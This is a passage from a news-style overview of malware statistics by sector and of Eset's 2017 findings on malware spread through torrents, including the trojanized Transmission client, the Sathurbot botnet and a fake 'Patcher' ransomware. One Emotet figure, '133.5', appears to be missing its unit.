If we consider malware by so-called "area of application," then, for example, the Emotet file virus remains the most dangerous for the banking sector: almost 133.5 hacking attempts involving it were prevented, while for Ramnit 78,062 attacks were blocked. In the mobile sector for Android, the leaders are SMSreg (1,638,167) and Shedun (1,345,900); for iOS, IOS_JailBreakTool.A (397) and IOS_IBackDoor.A (65). In PoS attacks, scammers most often used malicious tools such as TinyPOS (1,264) and Recoload (286).

"Both in Russia and around the world, we see a clearly defined trend of transition from the use of ransomware to cryptocurrency miners. If your laptop or smartphone has started draining its battery rapidly, be sure to check it with a modern antivirus,"
said Mikhail Kondrashin, CTO of Trend Micro in Russia and CIS.

2017: Eset records 15m cyber attacks on torrent users

On August 18, 2017, Eset published the results of an analysis of cyber attacks carried out using peer-to-peer networks. Since the beginning of 2016, the Eset telemetry system has recorded 15 million incidents in which the download of malicious code was associated with popular torrent applications and file-sharing services. Hackers use peer-to-peer networks to deliver malware in two ways: by compromising trusted torrent applications or by disguising malicious content in torrent uploads.

In particular, in 2016, attackers targeted macOS users by hacking the website of the Transmission torrent client. They modified the app to include malicious code.

In April 2016, the KeRanger encryptor was downloaded from the Transmission website under the guise of a legitimate application. The developers removed the infected distribution after a few hours, but thousands of users were affected by the threat. The authors of KeRanger used a strong encryption algorithm, which minimized the chances of data recovery.

In August 2016, hackers repeated the attack on the Transmission website. This time, along with the torrent client, the Keydnap malware was installed on the computer, designed to steal passwords from the iCloud Keychain and remotely access the system. The Transmission team removed the trojanized application from the site within minutes of Eset's contact.

However, according to Eset, not all incidents involve compromised software: there is also a risk of downloading malicious torrents. In April 2017, the company's experts discovered the Sathurbot trojan, which was distributed this way: it hid in torrents of pirated software or films, disguised as a codec.

Computers infected with Sathurbot became part of a botnet that at the time of the study totaled 20 thousand devices. The botnet searched the network for sites based on WordPress and hacked them by brute-forcing passwords. Compromised sites were used to further spread malicious torrents.

In February 2017, attackers distributed through torrent trackers a new encryptor disguised as Patcher, an application for cracking Adobe Premiere Pro, Microsoft Office for Mac and other paid software. Encrypted files cannot be restored even if the ransom is paid: the fake Patcher has no function for communicating with a command server, so the encryptor's operators do not have a decryption key.

"Just in case, I remind you of the liability for copyright infringement and the use of pirated content," said Alexey Oskin, head of technical marketing at Eset Russia. "Nevertheless, the P2P ecosystem is not only, and not so much, about piracy; it has a number of legitimate uses. And, like any mass technology, file-sharing services are of interest to cybercriminals. Basic recommendations: use only licensed software, ignore suspicious sites and torrents, and protect your computer with a comprehensive antivirus product."

Notes